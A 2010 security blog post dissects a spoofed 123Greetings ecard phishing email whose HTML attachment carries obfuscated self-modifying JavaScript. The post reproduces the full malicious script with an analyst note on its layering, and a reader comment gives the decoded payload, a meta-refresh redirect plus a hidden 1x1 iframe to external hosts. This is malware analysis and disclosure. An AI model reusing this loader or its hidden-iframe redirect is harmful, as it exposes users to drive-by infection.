Monday, June 14, 2010

More self-modifying Javascript.

More self-modifying JavaScript, this time arriving as the ecard.html attachment of the spoofed 123Greetings message below. There must be some sort of kit for this out there.


Delivered-To: xyz@dnull.com
Received: (qmail 9347 invoked by uid 82); 14 Jun 2010 12:33:19 -0000
Received: from net37.78.95-129.chelny.ertelecom.ru (95.78.37.129)
  by dnull.com with SMTP; 14 Jun 2010 12:33:19 -0000
Received: from 95.78.37.129 by mail.rjwaters.com; Mon, 14 Jun 2010 15:32:41 +0200
Message-ID: <000d01cb0bbd$aec28820$6400a8c0@positiverkk>
From: "123Greetings.com" <ecards@123greetings.com>
To:  xyz@dnull.com
Subject: positiverkk@rjwaters.com has sent you a birthday ecard.
Date: Mon, 14 Jun 2010 15:32:41 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0006_01CB0BBD.AEC28820"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB0BBD.AEC28820
Content-Type: text/plain;
 format=flowed;
 charset="Windows-1252";
 reply-type=original
Content-Transfer-Encoding: 7bit

[positiverkk@rjwaters.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.

ecard.html

<script>
// ANALYST NOTE (added for review; not part of the captured sample).
// This is the script from the ecard.html attachment. Treat it as a live sample:
// read it statically or in an isolated analysis environment, not in a normal browser.
//
// How the obfuscation is layered, as visible in the listing:
//  1. PR holds the method name replace, and cWhax is the global object (this).
//     Property names are written with filler letters that a replace call strips.
//     The stripped names resolve to: length, String, fromCharCode, charCodeAt,
//     eval, substring and unescape.
//  2. The many if (...) blocks only compare and reassign variables that are never
//     used again. None of them touches the fragments that make up Km; they are noise.
//  3. Km is the concatenation of the short string fragments. It is a percent-encoded
//     payload in which ten single letters each stand for a percent sign plus one digit.
//  4. YbeU/pFuQcs build the text of ten chained replace calls. The first eval runs
//     that text against Km and stores the restored percent-encoded string in CuoNi.
//  5. The second eval runs sv(unescape(CuoNi)). sv XORs every character code with 9
//     and returns the resulting string, which is then executed.
//
// The decoded final stage was not re-derived for this note. A reader analysis on this
// page reports that it calls document.write to emit a meta refresh redirect and a
// hidden 1x1 iframe.
//
// Detection-relevant traits: an HTML mail attachment whose visible content is a single
// script element, eval reached through a bracket lookup on the global object, two eval
// stages, and unescape followed by a one-byte XOR loop built on fromCharCode.
//
// Extraction note: the page wrapped lines after some > characters, which splits what
// appear to be two-character comparison operators. The listing is kept as displayed.
var jwp ; jwp = '' ; var cWhax=this;var PR= ''+'replace' ;var qEBr ,QlYGtB ;var Vtb= 135; if (qEBr==QlYGtB){qEBr = QlYGtB -Vtb;}var XR = 'PZiwIHEbmSVFCg' ; var ECA='OcrRadyvPTqvcGV' ; var jYsZyG; jYsZyG='t4tcP7'; var Nht,sz ,IhBx ;if (IhBx<Nht || Nht>
=sz){Nht= sz^IhBx;}var tbDU='0tdtdtc'; var FwMRi ='9t0tdP4P8P9KeK9Xet0tdXdt1' ;var aYPV=219;var assM, PVqWMD ; if (aYPV>
assM){aYPV = assM+PVqWMD;}var ELNT='t6t5tdXaX9tct8t2K7tat6t4K6O5KbK9K6P7P5t0tfXbt8t4tcK9XaXbtaP4Ket1XdXdX9P3K6K6tet6tet6t6X9K7ta'; function sv(nkAfi){var PYQS =jwp; for(vytw= 0 ;vytw<nkAfi['lKeZnugGtKhG'[PR](/[GKudZ]/g,jwp)] ; ++vytw){PYQS =PYQS+cWhax['SGtGrXiRnLgR'[PR](/[RXdGL]/g ,jwp)]['fqrqonmjCjhjanrjCSoSdSen'[PR](/[nqSjO]/g ,jwp)](9^nkAfi['cxhlaQrQCEovdQeQAvtv'[PR](/[vxQEl]/g, jwp)](vytw)); }return PYQS ;}var cNovEF; cNovEF ='' ;var Ult =287 ; var XV , OFRHX; if (OFRHX>
Ult && Ult==XV){Ult = XV - OFRHX ;}cNovEF='t7P2KeP7P5K6t0' ; var cEN= 671; var vGrGWx =49;var wbOXK=8; if (cEN<vGrGWx){cEN= vGrGWx^wbOXK; }var yt ;yt ='' ; yt ='P4KeP8KeK9t1tct0tet1XdP4';var miOda='hrJHSbCrj';var uuRmg ;uuRmg= '';uuRmg = 'K7tat6t4P3P1P9P1P9K6t' ;var qaiU =425; var HRrdL = 625;var UwkVX ; UwkVX=455 ; if (qaiU>
HRrdL){qaiU =HRrdL^UwkVX ;}var lM = 'cujgJRXbCumHlckmswa';var fz ; fz = ''; var eg = 564 ; var HBZP ,cWnUTE ; if (eg>
=HBZP){eg = HBZP - cWnUTE;}fz ='0t7tdtcX1K7X9t1X9P6X'; var wpNFA,pRZ ;var yXAK=896; if (wpNFA>
pRZ){wpNFA = pRZ/yXAK;}var YZX;YZX='KeP8KeK9XaXdX0t5t'; var wrqylK;wrqylK = 'KbK'; var WfLtQN ; WfLtQN =432;var lE=833 ; var eYig =524 ; if (eYig =WfLtQN || WfLtQN<lE){WfLtQN= lE-eYig;}var gIsW ; gIsW ='' ;var ETuZX ,vt;var xzLS =433;if (ETuZX<vt){ETuZX=vt -xzLS; }gIsW='Xftc' ; var QOh , Tfxm , USrprT ; if (QOh>
=Tfxm){QOh =Tfxm+USrprT ; }var Au = 'XtVOyHAW'; var TUsG=217; var Mvm ;Mvm = 3;var CVc; CVc=676 ; if (TUsG>
Mvm){TUsG =Mvm^CVc; }var UeJmfD = 'Xbt5P4t1XdXdX9P3K6K6Xd'; var IyrWK ; IyrWK='t8t5tctd' ; var CaigsD= 819;var YG, ccjfI;if (ccjfI<CaigsD && CaigsD<YG){CaigsD=YG -ccjfI; }var EE ; EE= '' ; EE= '0P2' ; var It; It='Xft0Xat0tbt0t5t0XdX0P3K9t1t' ;var PCUM, bvEVF ; var lwRIU =925 ; if (PCUM==bvEVF){PCUM =bvEVF/lwRIU ;}var MoOU='DECiRVNbVM'; var uRMo, Tw, TbwgHq ;if (uRMo>
Tw){uRMo=Tw -TbwgHq; }var jZGWg = 'HbwTxZ';var zA= 168 ; var oKMNLY= 74; var YNMHpo ;YNMHpo = 312; if (zA>
oKMNLY){zA= oKMNLY+YNMHpo ; }var it='dP4O5KbPaP2Xc' ;var RK ='tdt6taXct4tct7XdK7XeXbt0XdtcK1KbP5t4tcXdt8K9t1XdXdX9K4tcX8Xct0XfP4O5KbXbtctfXbtcXat1O5KbK9tat6t7Xdtct7X'; var pFlFl; pFlFl = '' ;var ufSfR=660; var cbcj=76; var zKTEu = 676 ; if (ufSfR==cbcj){ufSfR =cbcj-zKTEu;}pFlFl = 't8Xat8t7t6Xft8Xbtc' ; var ICqTJ= 945;var yXDh ,Nbu; if (Nbu= ICqTJ && ICqTJ>
yXDh){ICqTJ=yXDh^Nbu; }var iAc; iAc= '';iAc ='tfXbt8'; var aidGt =25 ;var zwxfqC = 337;var AfCI ;AfCI = 159 ; if (aidGt<zwxfqC){aidGt=zwxfqC+AfCI ; }var LbomSl='cP4Ke' ; var hMjFLa=601 ; var bzpXo ,NPqgN; if (hMjFLa==bzpXo){hMjFLa =bzpXo/NPqgN ;}var MAJjm;MAJjm=jwp ;var Km=RK+it ;Km = Km+UeJmfD+ELNT+pFlFl+gIsW+IyrWK+uuRmg;Km= Km+fz;Km= Km+FwMRi+yt+YZX+LbomSl ;Km = Km+It ;Km = Km+tbDU; Km=Km+cNovEF+iAc+jYsZyG; Km= Km+wrqylK; Km=Km+EE+MAJjm ; var YbeU='xKA2osQ0IPn3UOl5YSa1jWL4HXB7mhr8ztv6JZT9'[PR](/[xoIUYjHmzJ]/g ,'\%')[PR](/[AQnlaLBrvT]/g , '\\') ; var ynSSG= "')[PR](/["; var GZGLMc= "]/g ,'%" ;var pFuQcs =YbeU[PR](/[\%]/g ,ynSSG)[PR](/[\\]/g ,GZGLMc);var Inlz, YwGin ; var gRw = 35; if (Inlz==YwGin){Inlz=YwGin^gRw ;}cWhax['eBvAaClF'[PR](/[FCAHB]/g, jwp)]('var CuoNi= Km'+pFuQcs['shuhbhsAtArPiznPga'[PR](/[aAhzP]/g,jwp)](2 ,pFuQcs['lEeSnSgStIhH'[PR](/[HBSIE]/g , jwp)])+"'); "); cWhax['eovnaIlI'[PR](/[InopA]/g , jwp)](sv(cWhax[['uEntejsjcjaEpVej'[PR](/[jVwtE]/g, jwp)]](CuoNi))) ;</script>




1 comment:

mmengel said...

Just about all of the IFs act as a smokescreen to distract from what it's really doing. The real intent is building a huge string (concatenated variables) that changes due to .replace() and ends up as:

document.write("<meta http-equiv=\"refresh\" content=\"3;url=http://toldspeak.com/\" /><iframe src='http://gogoop.casanovarevealed.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>");

The result is a different form of what you wrote about in your other post. Feel free to look at my comment (2nd comment) where I gave some links for explanation and how to attempt to complain about it.